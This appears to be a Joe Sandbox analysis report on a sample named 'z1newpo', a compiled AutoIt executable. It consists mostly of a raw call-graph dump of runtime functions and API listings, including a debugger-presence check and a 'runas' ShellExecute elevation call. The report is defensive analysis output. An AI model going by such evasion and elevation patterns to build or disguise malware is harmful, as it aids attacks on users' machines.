87134 41341f 58 API calls 2 library calls 87112->87134 87114 41d41a 87114->87101 87135 41341f 58 API calls 2 library calls 87114->87135 87116 41d439 87116->87101 87136 41341f 58 API calls 2 library calls 87116->87136 87118->87066 87119->87078 87120->87078 87121->87078 87122->87078 87128 4181f2 LeaveCriticalSection 87123->87128 87125 41d602 87125->87088 87126->87096 87127->87096 87128->87125 87139 422b35 87129->87139 87131 422c14 87131->87110 87132->87103 87133->87110 87134->87114 87135->87116 87136->87101 87137->87109 87138->87110 87140 422b41 _doexit 87139->87140 87141 422b54 87140->87141 87143 422b8a 87140->87143 87142 417f77 _W_expandtime 46 API calls 87141->87142 87144 422b59 87142->87144 87145 422400 __tsopen_nolock 109 API calls 87143->87145 87146 417f25 _W_expandtime 10 API calls 87144->87146 87147 422ba4 87145->87147 87149 422b63 _doexit 87146->87149 87148 422bcb __wsopen_helper LeaveCriticalSection 87147->87148 87148->87149 87149->87131 87153 4150dd _doexit 87150->87153 87151 4150e9 87181 417f77 46 API calls __getptd_noexit 87151->87181 87153->87151 87154 41510f 87153->87154 87163 415471 87154->87163 87155 4150ee 87182 417f25 10 API calls _W_expandtime 87155->87182 87162 4150f9 _doexit 87162->87007 87164 415483 87163->87164 87165 4154a5 EnterCriticalSection 87163->87165 87164->87165 87167 41548b 87164->87167 87166 415117 87165->87166 87169 415047 87166->87169 87168 4182cb __lock 46 API calls 87167->87168 87168->87166 87170 415067 87169->87170 87171 415057 87169->87171 87176 415079 87170->87176 87184 414e4e 87170->87184 87239 417f77 46 API calls __getptd_noexit 87171->87239 87175 41505c 87183 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87175->87183 87201 41443c 87176->87201 87179 4150b9 87214 41e1f4 87179->87214 87181->87155 87182->87162 87183->87162 87185 414e61 87184->87185 87186 414e79 87184->87186 87240 417f77 46 API calls __getptd_noexit 87185->87240 87188 414139 __fputwc_nolock 46 API calls 87186->87188 87190 414e80 87188->87190 87189 
414e66 87241 417f25 10 API calls _W_expandtime 87189->87241 87192 41e1f4 __write 51 API calls 87190->87192 87193 414e97 87192->87193 87194 414f09 87193->87194 87196 414ec9 87193->87196 87200 414e71 87193->87200 87242 417f77 46 API calls __getptd_noexit 87194->87242 87197 41e1f4 __write 51 API calls 87196->87197 87196->87200 87198 414f64 87197->87198 87199 41e1f4 __write 51 API calls 87198->87199 87198->87200 87199->87200 87200->87176 87202 414455 87201->87202 87206 414477 87201->87206 87203 414139 __fputwc_nolock 46 API calls 87202->87203 87202->87206 87204 414470 87203->87204 87243 41b7b2 77 API calls 6 library calls 87204->87243 87207 414139 87206->87207 87208 414145 87207->87208 87209 41415a 87207->87209 87244 417f77 46 API calls __getptd_noexit 87208->87244 87209->87179 87211 41414a 87245 417f25 10 API calls _W_expandtime 87211->87245 87213 414155 87213->87179 87215 41e200 _doexit 87214->87215 87216 41e223 87215->87216 87217 41e208 87215->87217 87218 41e22f 87216->87218 87223 41e269 87216->87223 87266 417f8a 46 API calls __getptd_noexit 87217->87266 87268 417f8a 46 API calls __getptd_noexit 87218->87268 87221 41e20d 87267 417f77 46 API calls __getptd_noexit 87221->87267 87222 41e234 87269 417f77 46 API calls __getptd_noexit 87222->87269 87246 41ae56 87223->87246 87227 41e215 _doexit 87227->87175 87228 41e23c 87270 417f25 10 API calls _W_expandtime 87228->87270 87229 41e26f 87231 41e291 87229->87231 87232 41e27d 87229->87232 87271 417f77 46 API calls __getptd_noexit 87231->87271 87256 41e17f 87232->87256 87235 41e296 87272 417f8a 46 API calls __getptd_noexit 87235->87272 87236 41e289 87273 41e2c0 LeaveCriticalSection __unlock_fhandle 87236->87273 87239->87175 87240->87189 87241->87200 87242->87200 87243->87206 87244->87211 87245->87213 87247 41ae62 _doexit 87246->87247 87248 41aebc 87247->87248 87250 4182cb __lock 46 API calls 87247->87250 87249 41aec1 EnterCriticalSection 87248->87249 87251 41aede _doexit 87248->87251 87249->87251 87252 41ae8e 87250->87252 
87251->87229 87253 41aeaa 87252->87253 87254 41ae97 InitializeCriticalSectionAndSpinCount 87252->87254 87255 41aeec ___lock_fhandle LeaveCriticalSection 87253->87255 87254->87253 87255->87248 87257 41aded __lseeki64_nolock 46 API calls 87256->87257 87258 41e18e 87257->87258 87259 41e1a4 SetFilePointer 87258->87259 87260 41e194 87258->87260 87262 41e1c3 87259->87262 87263 41e1bb GetLastError 87259->87263 87261 417f77 _W_expandtime 46 API calls 87260->87261 87264 41e199 87261->87264 87262->87264 87265 417f9d __dosmaperr 46 API calls 87262->87265 87263->87262 87264->87236 87265->87264 87266->87221 87267->87227 87268->87222 87269->87228 87270->87227 87271->87235 87272->87236 87273->87227 87275 4149ea 87274->87275 87276 4149fe 87274->87276 87320 417f77 46 API calls __getptd_noexit 87275->87320 87277 4149fa 87276->87277 87279 41443c __flush 77 API calls 87276->87279 87292 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87277->87292 87282 414a0a 87279->87282 87280 4149ef 87321 417f25 10 API calls _W_expandtime 87280->87321 87293 41d8c2 87282->87293 87285 414139 __fputwc_nolock 46 API calls 87286 414a18 87285->87286 87297 41d7fe 87286->87297 87288 414a1e 87288->87277 87289 413748 _free 46 API calls 87288->87289 87289->87277 87290->87021 87291->87025 87292->87025 87294 41d8d2 87293->87294 87296 414a12 87293->87296 87295 413748 _free 46 API calls 87294->87295 87294->87296 87295->87296 87296->87285 87298 41d80a _doexit 87297->87298 87299 41d812 87298->87299 87300 41d82d 87298->87300 87337 417f8a 46 API calls __getptd_noexit 87299->87337 87302 41d839 87300->87302 87306 41d873 87300->87306 87339 417f8a 46 API calls __getptd_noexit 87302->87339 87303 41d817 87338 417f77 46 API calls __getptd_noexit 87303->87338 87305 41d83e 87340 417f77 46 API calls __getptd_noexit 87305->87340 87309 41ae56 ___lock_fhandle 48 API calls 87306->87309 87312 41d879 87309->87312 87310 41d81f _doexit 87310->87288 87311 41d846 87341 417f25 10 API calls _W_expandtime 87311->87341 87314 41d893 
87312->87314 87315 41d887 87312->87315 87342 417f77 46 API calls __getptd_noexit 87314->87342 87322 41d762 87315->87322 87318 41d88d 87343 41d8ba LeaveCriticalSection __unlock_fhandle 87318->87343 87320->87280 87321->87277 87344 41aded 87322->87344 87324 41d772 87325 41d7c8 87324->87325 87326 41d7a6 87324->87326 87328 41aded __lseeki64_nolock 46 API calls 87324->87328 87357 41ad67 47 API calls 2 library calls 87325->87357 87326->87325 87329 41aded __lseeki64_nolock 46 API calls 87326->87329 87332 41d79d 87328->87332 87333 41d7b2 CloseHandle 87329->87333 87330 41d7d0 87331 41d7f2 87330->87331 87358 417f9d 46 API calls 3 library calls 87330->87358 87331->87318 87335 41aded __lseeki64_nolock 46 API calls 87332->87335 87333->87325 87336 41d7be GetLastError 87333->87336 87335->87326 87336->87325 87337->87303 87338->87310 87339->87305 87340->87311 87341->87310 87342->87318 87343->87310 87345 41ae12 87344->87345 87346 41adfa 87344->87346 87349 417f8a __close 46 API calls 87345->87349 87350 41ae51 87345->87350 87347 417f8a __close 46 API calls 87346->87347 87348 41adff 87347->87348 87351 417f77 _W_expandtime 46 API calls 87348->87351 87352 41ae23 87349->87352 87350->87324 87356 41ae07 87351->87356 87353 417f77 _W_expandtime 46 API calls 87352->87353 87354 41ae2b 87353->87354 87355 417f25 _W_expandtime 10 API calls 87354->87355 87355->87356 87356->87324 87357->87330 87358->87331 87360 414c82 _doexit 87359->87360 87361 414cc3 87360->87361 87362 414c96 __localtime64_s 87360->87362 87363 414cbb _doexit 87360->87363 87364 415471 __lock_file 47 API calls 87361->87364 87386 417f77 46 API calls __getptd_noexit 87362->87386 87363->87030 87366 414ccb 87364->87366 87372 414aba 87366->87372 87367 414cb0 87387 417f25 10 API calls _W_expandtime 87367->87387 87376 414ad8 __localtime64_s 87372->87376 87379 414af2 87372->87379 87373 414ae2 87439 417f77 46 API calls __getptd_noexit 87373->87439 87375 414ae7 87440 417f25 10 API calls _W_expandtime 87375->87440 87376->87373 87376->87379 87383 
414b2d 87376->87383 87388 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87379->87388 87380 414c38 __localtime64_s 87442 417f77 46 API calls __getptd_noexit 87380->87442 87381 414139 __fputwc_nolock 46 API calls 87381->87383 87383->87379 87383->87380 87383->87381 87389 41dfcc 87383->87389 87419 41d8f3 87383->87419 87441 41e0c2 46 API calls 3 library calls 87383->87441 87386->87367 87387->87363 87388->87363 87390 41dfd8 _doexit 87389->87390 87391 41dfe0 87390->87391 87392 41dffb 87390->87392 87512 417f8a 46 API calls __getptd_noexit 87391->87512 87393 41e007 87392->87393 87399 41e041 87392->87399 87514 417f8a 46 API calls __getptd_noexit 87393->87514 87395 41dfe5 87513 417f77 46 API calls __getptd_noexit 87395->87513 87398 41e00c 87515 417f77 46 API calls __getptd_noexit 87398->87515 87400 41e063 87399->87400 87401 41e04e 87399->87401 87404 41ae56 ___lock_fhandle 48 API calls 87400->87404 87517 417f8a 46 API calls __getptd_noexit 87401->87517 87407 41e069 87404->87407 87405 41e014 87516 417f25 10 API calls _W_expandtime 87405->87516 87406 41e053 87518 417f77 46 API calls __getptd_noexit 87406->87518 87410 41e077 87407->87410 87411 41e08b 87407->87411 87409 41dfed _doexit 87409->87383 87443 41da15 87410->87443 87519 417f77 46 API calls __getptd_noexit 87411->87519 87415 41e083 87521 41e0ba LeaveCriticalSection __unlock_fhandle 87415->87521 87416 41e090 87520 417f8a 46 API calls __getptd_noexit 87416->87520 87420 41d900 87419->87420 87424 41d915 87419->87424 87525 417f77 46 API calls __getptd_noexit 87420->87525 87422 41d905 87526 417f25 10 API calls _W_expandtime 87422->87526 87425 41d910 87424->87425 87426 41d94a 87424->87426 87522 420603 87424->87522 87425->87383 87428 414139 __fputwc_nolock 46 API calls 87426->87428 87429 41d95e 87428->87429 87430 41dfcc __read 59 API calls 87429->87430 87431 41d965 87430->87431 87431->87425 87432 414139 __fputwc_nolock 46 API calls 87431->87432 87433 41d988 87432->87433 87433->87425 87434 414139 __fputwc_nolock 46 API 
calls 87433->87434 87435 41d994 87434->87435 87435->87425 87436 414139 __fputwc_nolock 46 API calls 87435->87436 87437 41d9a1 87436->87437 87438 414139 __fputwc_nolock 46 API calls 87437->87438 87438->87425 87439->87375 87440->87379 87441->87383 87442->87375 87444 41da31 87443->87444 87445 41da4c 87443->87445 87447 417f8a __close 46 API calls 87444->87447 87446 41da5b 87445->87446 87449 41da7a 87445->87449 87450 417f8a __close 46 API calls 87446->87450 87448 41da36 87447->87448 87451 417f77 _W_expandtime 46 API calls 87448->87451 87453 41da98 87449->87453 87464 41daac 87449->87464 87452 41da60 87450->87452 87465 41da3e 87451->87465 87455 417f77 _W_expandtime 46 API calls 87452->87455 87456 417f8a __close 46 API calls 87453->87456 87454 41db02 87458 417f8a __close 46 API calls 87454->87458 87457 41da67 87455->87457 87459 41da9d 87456->87459 87461 417f25 _W_expandtime 10 API calls 87457->87461 87462 41db07 87458->87462 87460 417f77 _W_expandtime 46 API calls 87459->87460 87463 41daa4 87460->87463 87461->87465 87466 417f77 _W_expandtime 46 API calls 87462->87466 87468 417f25 _W_expandtime 10 API calls 87463->87468 87464->87454 87464->87465 87467 41dae1 87464->87467 87470 41db1b 87464->87470 87465->87415 87466->87463 87467->87454 87469 41daec ReadFile 87467->87469 87468->87465 87474 41dc17 87469->87474 87475 41df8f GetLastError 87469->87475 87472 416b04 __malloc_crt 46 API calls 87470->87472 87473 41db31 87472->87473 87478 41db59 87473->87478 87479 41db3b 87473->87479 87474->87475 87483 41dc2b 87474->87483 87476 41de16 87475->87476 87477 41df9c 87475->87477 87487 417f9d __dosmaperr 46 API calls 87476->87487 87491 41dd9b 87476->87491 87481 417f77 _W_expandtime 46 API calls 87477->87481 87480 420494 __lseeki64_nolock 48 API calls 87478->87480 87482 417f77 _W_expandtime 46 API calls 87479->87482 87484 41db67 87480->87484 87485 41dfa1 87481->87485 87486 41db40 87482->87486 87483->87491 87497 41de5b 87483->87497 87499 41dc47 87483->87499 87484->87469 87488 417f8a __close 46 
API calls 87485->87488 87489 417f8a __close 46 API calls 87486->87489 87487->87491 87488->87491 87489->87465 87490 413748 _free 46 API calls 87490->87465 87491->87465 87491->87490 87492 41dcab ReadFile 87496 41dcc9 GetLastError 87492->87496 87503 41dcd3 87492->87503 87493 41ded0 ReadFile 87494 41deef GetLastError 87493->87494 87504 41def9 87493->87504 87494->87497 87494->87504 87495 41ddec MultiByteToWideChar 87495->87491 87498 41de10 GetLastError 87495->87498 87496->87499 87496->87503 87497->87491 87497->87493 87498->87476 87499->87492 87500 41dd28 87499->87500 87500->87491 87501 41dda3 87500->87501 87502 41dd96 87500->87502 87506 41dd60 87500->87506 87501->87506 87507 41ddda 87501->87507 87505 417f77 _W_expandtime 46 API calls 87502->87505 87503->87499 87508 420494 __lseeki64_nolock 48 API calls 87503->87508 87504->87497 87509 420494 __lseeki64_nolock 48 API calls 87504->87509 87505->87491 87506->87495 87510 420494 __lseeki64_nolock 48 API calls 87507->87510 87508->87503 87509->87504 87511 41dde9 87510->87511 87511->87495 87512->87395 87513->87409 87514->87398 87515->87405 87516->87409 87517->87406 87518->87405 87519->87416 87520->87415 87521->87409 87523 416b04 __malloc_crt 46 API calls 87522->87523 87524 420618 87523->87524 87524->87426 87525->87422 87526->87425 87530 4148b3 GetSystemTimeAsFileTime __aulldiv 87527->87530 87529 442c6b 87529->87033 87530->87529 87531->87040 87532->87046 87533->87046 87535 45272f __tzset_nolock _wcscpy 87534->87535 87536 414d04 61 API calls __fread_nolock 87535->87536 87537 44afef GetSystemTimeAsFileTime 87535->87537 87538 4528a4 87535->87538 87539 4150d1 81 API calls _fseek 87535->87539 87536->87535 87537->87535 87538->86954 87538->86955 87539->87535 87541 44b1bc 87540->87541 87542 44b1ca 87540->87542 87543 4149c2 116 API calls 87541->87543 87544 44b1e1 87542->87544 87545 44b1d8 87542->87545 87546 4149c2 116 API calls 87542->87546 87543->87542 87575 4321a4 87544->87575 87545->86982 87548 44b2db 87546->87548 87548->87544 87550 
44b2e9 87548->87550 87549 44b224 87551 44b253 87549->87551 87552 44b228 87549->87552 87553 44b2f6 87550->87553 87555 414a46 __fcloseall 82 API calls 87550->87555 87579 43213d 87551->87579 87554 44b235 87552->87554 87558 414a46 __fcloseall 82 API calls 87552->87558 87553->86982 87559 44b245 87554->87559 87562 414a46 __fcloseall 82 API calls 87554->87562 87555->87553 87557 44b25a 87560 44b260 87557->87560 87561 44b289 87557->87561 87558->87554 87559->86982 87563 44b26d 87560->87563 87565 414a46 __fcloseall 82 API calls 87560->87565 87589 44b0bf 87 API calls 87561->87589 87562->87559 87566 44b27d 87563->87566 87568 414a46 __fcloseall 82 API calls 87563->87568 87565->87563 87566->86982 87567 44b28f 87590 4320f8 46 API calls _free 87567->87590 87568->87566 87570 44b295 87571 44b2a2 87570->87571 87572 414a46 __fcloseall 82 API calls 87570->87572 87573 44b2b2 87571->87573 87574 414a46 __fcloseall 82 API calls 87571->87574 87572->87571 87573->86982 87574->87573 87576 4321b4 __tzset_nolock _memmove 87575->87576 87577 4321cb 87575->87577 87576->87549 87578 414d04 __fread_nolock 61 API calls 87577->87578 87578->87576 87580 4135bb _malloc 46 API calls 87579->87580 87581 432150 87580->87581 87582 4135bb _malloc 46 API calls 87581->87582 87583 432162 87582->87583 87584 4135bb _malloc 46 API calls 87583->87584 87585 432174 87584->87585 87587 432189 87585->87587 87591 4320f8 46 API calls _free 87585->87591 87587->87557 87588 432198 87588->87557 87589->87567 87590->87570 87591->87588 87592->86885 87593->86887 87594->86905 87595->86905 87596->86905 87597->86899 87598->86905 87599->86905 87600->86909 87601->86918 87602->86920 87603->86920 87653 410160 87604->87653 87606 41012f GetFullPathNameW 87607 410147 ctype 87606->87607 87607->86739 87609 4102cb SHGetDesktopFolder 87608->87609 87612 410333 _wcsncpy 87608->87612 87610 4102e0 _wcsncpy 87609->87610 87609->87612 87611 41031c SHGetPathFromIDListW 87610->87611 87610->87612 87611->87612 87612->86743 87614 425f4a 87613->87614 87615 
4101bb 87613->87615 87618 4114ab __wcsicoll 58 API calls 87614->87618 87621 425f6e 87614->87621 87616 410160 52 API calls 87615->87616 87617 4101c7 87616->87617 87657 410200 52 API calls 2 library calls 87617->87657 87618->87614 87620 4101d6 87658 410200 52 API calls 2 library calls 87620->87658 87621->86745 87623 4101e9 87623->86745 87625 40f760 128 API calls 87624->87625 87626 40f584 87625->87626 87627 429335 87626->87627 87628 40f58c 87626->87628 87631 4528bd 118 API calls 87627->87631 87629 40f598 87628->87629 87630 429358 87628->87630 87683 4033c0 113 API calls 7 library calls 87629->87683 87684 434034 86 API calls _wprintf 87630->87684 87633 42934b 87631->87633 87637 429373 87633->87637 87638 42934f 87633->87638 87635 429369 87635->87637 87636 40f5b4 87636->86742 87639 4115d7 52 API calls 87637->87639 87640 431e58 82 API calls 87638->87640 87652 4293c5 ctype 87639->87652 87640->87630 87641 42959c 87642 413748 _free 46 API calls 87641->87642 87643 4295a5 87642->87643 87644 431e58 82 API calls 87643->87644 87645 4295b1 87644->87645 87649 401b10 52 API calls 87649->87652 87652->87641 87652->87649 87659 444af8 87652->87659 87662 44b41c 87652->87662 87669 402780 87652->87669 87677 4022d0 87652->87677 87685 44c7dd 64 API calls 3 library calls 87652->87685 87654 410167 _wcslen 87653->87654 87655 4115d7 52 API calls 87654->87655 87656 41017e _wcscpy 87655->87656 87656->87606 87657->87620 87658->87623 87660 4115d7 52 API calls 87659->87660 87661 444b27 _memmove 87660->87661 87661->87652 87663 44b429 87662->87663 87664 4115d7 52 API calls 87663->87664 87665 44b440 87664->87665 87666 44b45e 87665->87666 87667 401b10 52 API calls 87665->87667 87666->87652 87668 44b453 87667->87668 87668->87652 87670 402827 87669->87670 87673 402790 ctype _memmove 87669->87673 87672 4115d7 52 API calls 87670->87672 87671 4115d7 52 API calls 87674 402797 87671->87674 87672->87673 87673->87671 87675 4027bd 87674->87675 87676 4115d7 52 API calls 87674->87676 87675->87652 87676->87675 87678 
4022e0 87677->87678 87679 40239d 87677->87679 87678->87679 87680 4115d7 52 API calls 87678->87680 87682 402320 ctype 87678->87682 87679->87652 87680->87682 87681 4115d7 52 API calls 87681->87682 87682->87679 87682->87681 87683->87636 87684->87635 87685->87652 87687 402417 87686->87687 87691 402539 ctype 87686->87691 87688 4115d7 52 API calls 87687->87688 87687->87691 87689 402443 87688->87689 87690 4115d7 52 API calls 87689->87690 87692 4024b4 87690->87692 87691->86749 87692->87691 87694 4022d0 52 API calls 87692->87694 87715 402880 95 API calls 2 library calls 87692->87715 87694->87692 87700 401566 87695->87700 87696 401794 87716 40e9a0 90 API calls 87696->87716 87699 4010a0 52 API calls 87699->87700 87700->87696 87700->87699 87702 40167a 87700->87702 87701 4017c0 87701->86751 87702->87701 87717 45e737 90 API calls 3 library calls 87702->87717 87704 40bc70 52 API calls 87703->87704 87705 40d451 87704->87705 87706 40d50f 87705->87706 87708 427c01 87705->87708 87709 40e0a0 52 API calls 87705->87709 87711 401b10 52 API calls 87705->87711 87712 40d519 87705->87712 87718 40f310 53 API calls 87705->87718 87719 40d860 91 API calls 87705->87719 87720 410600 52 API calls 87706->87720 87721 45e737 90 API calls 3 library calls 87708->87721 87709->87705 87711->87705 87712->86754 87715->87692 87716->87702 87717->87701 87718->87705 87719->87705 87720->87712 87721->87712 87722->86767 87723->86768 87725 42c5fe 87724->87725 87740 4091c6 87724->87740 87726 40bc70 52 API calls 87725->87726 87725->87740 87727 42c64e InterlockedIncrement 87726->87727 87728 42c665 87727->87728 87734 42c697 87727->87734 87730 42c672 InterlockedDecrement Sleep InterlockedIncrement 87728->87730 87728->87734 87729 42c737 InterlockedDecrement 87731 42c74a 87729->87731 87730->87728 87730->87734 87733 408f40 VariantClear 87731->87733 87732 42c731 87732->87729 87735 42c752 87733->87735 87734->87729 87734->87732 88008 408e80 87734->88008 88017 410c60 VariantClear ctype 87735->88017 87740->86828 87741 42c6db 
87742 402160 52 API calls 87741->87742 87743 42c6e5 87742->87743 88013 45340c 85 API calls 87743->88013 87745 42c6f1 88014 40d200 52 API calls 2 library calls 87745->88014 87747 42c6fb 88015 465124 53 API calls 87747->88015 87749 42c715 87750 42c76a 87749->87750 87751 42c719 87749->87751 87752 401b10 52 API calls 87750->87752 88016 46fe32 VariantClear 87751->88016 87754 42c77e 87752->87754 87755 401980 53 API calls 87754->87755 87761 42c796 87755->87761 87756 42c812 88019 46fe32 VariantClear 87756->88019 87758 42c82a InterlockedDecrement 88020 46ff07 54 API calls 87758->88020 87760 42c864 88021 45e737 90 API calls 3 library calls 87760->88021 87761->87756 87761->87760 88018 40ba10 52 API calls 2 library calls 87761->88018 87762 42c9ec 88064 47d33e 331 API calls 87762->88064 87766 42c9fe 88065 46feb1 VariantClear VariantClear 87766->88065 87768 408f40 VariantClear 87774 42c849 87768->87774 87769 42ca08 87772 401b10 52 API calls 87769->87772 87770 42c874 87773 408f40 VariantClear 87770->87773 87781 42ca59 87770->87781 87771 402780 52 API calls 87771->87774 87775 42ca15 87772->87775 87776 42c891 87773->87776 87774->87762 87774->87768 87774->87771 87777 401980 53 API calls 87774->87777 88023 40a780 87774->88023 87778 40c2c0 52 API calls 87775->87778 88022 410c60 VariantClear ctype 87776->88022 87777->87774 87778->87770 87781->87781 87783 40afc4 87782->87783 87784 40b156 87782->87784 87785 40afd5 87783->87785 87786 42d1e3 87783->87786 88075 45e737 90 API calls 3 library calls 87784->88075 87790 40a780 194 API calls 87785->87790 87804 40b11a ctype 87785->87804 88076 45e737 90 API calls 3 library calls 87786->88076 87789 40b143 87789->86828 87793 40b00a 87790->87793 87791 42d1f8 87795 408f40 VariantClear 87791->87795 87793->87791 87796 40b012 87793->87796 87794 42d4db 87794->87794 87795->87789 87797 40b04a 87796->87797 87798 40b094 ctype 87796->87798 87799 42d231 VariantClear 87796->87799 87802 40b05c ctype 87797->87802 88077 40e270 VariantClear ctype 87797->88077 87800 
40b108 87798->87800 87801 42d425 ctype 87798->87801 87799->87802 87800->87804 88078 40e270 VariantClear ctype 87800->88078 87803 42d45a VariantClear 87801->87803 87801->87804 87802->87798 87807 4115d7 52 API calls 87802->87807 87803->87804 87804->87789 88079 45e737 90 API calls 3 library calls 87804->88079 87807->87798 87809 408fff 87808->87809 87822 40900d 87808->87822 88080 403ea0 52 API calls __cinit 87809->88080 87812 42c3f6 88083 45e737 90 API calls 3 library calls 87812->88083 87814 40a780 194 API calls 87814->87822 87815 42c44a 88085 45e737 90 API calls 3 library calls 87815->88085 87817 42c47b 88086 451b42 61 API calls 87817->88086 87819 42c4cb 88088 47faae 233 API calls 87819->88088 87820 42c564 87825 408f40 VariantClear 87820->87825 87822->87812 87822->87814 87822->87815 87822->87817 87822->87819 87822->87820 87824 42c548 87822->87824 87828 409112 87822->87828 87829 42c528 87822->87829 87831 4090df 87822->87831 87836 4090ea 87822->87836 87840 4090f2 ctype 87822->87840 88082 4534e3 52 API calls 87822->88082 88084 40c4e0 194 API calls 87822->88084 88091 45e737 90 API calls 3 library calls 87824->88091 87825->87840 87826 42c491 87826->87840 88087 45e737 90 API calls 3 library calls 87826->88087 87827 42c4da 87827->87840 88089 45e737 90 API calls 3 library calls 87827->88089 87828->87824 87834 40912b 87828->87834 88090 45e737 90 API calls 3 library calls 87829->88090 87831->87836 87837 408e80 VariantClear 87831->87837 87834->87840 88081 403e10 53 API calls 87834->88081 87838 408f40 VariantClear 87836->87838 87837->87836 87838->87840 87840->86828 87841 40914b 87842 408f40 VariantClear 87841->87842 87842->87840 88092 408d90 87843->88092 87845 429778 88120 410c60 VariantClear ctype 87845->88120 87847 429780 87848 408cf9 87848->87845 87849 42976c 87848->87849 87851 408d2d 87848->87851 88119 45e737 90 API calls 3 library calls 87849->88119 88108 403d10 87851->88108 87854 408d71 ctype 87854->86828 87855 408d45 ctype 87855->87854 87856 408f40 VariantClear 
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
• This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
• runas, xrefs: 0042E2AD, 0042E2DC
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
• String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
• API String ID: 2495805114-3383388033
• Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
• Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
• Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Control-flow Graph
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
